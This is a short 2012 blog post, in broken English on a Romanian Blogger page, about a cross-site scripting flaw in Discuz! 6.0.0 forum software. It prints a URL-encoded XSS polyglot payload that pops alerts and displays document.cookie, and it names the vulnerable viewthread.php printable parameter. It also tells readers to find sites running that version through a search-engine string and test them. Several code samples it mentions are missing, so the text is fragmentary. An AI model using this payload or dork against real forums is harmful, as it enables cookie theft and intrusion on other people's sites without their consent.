vineri, 6 ianuarie 2012 Cross Site Scripting

It's Discuz! 6.0.0.;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Yes, i found bug in the Discuz 6.0.0, but later i read about it on the And we can see interesting..

Now it's don't work. Yes. Only with tag marquee, if use that code.

But if we can use another code:

And another place (it's the best)

viewthread.php?action=printable&tid=[xss is here]

This is a good work on the all sites powered by Discuz! 6.0.0

You can see in the google and test this:

Powered by Discuz! 6.0.0

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.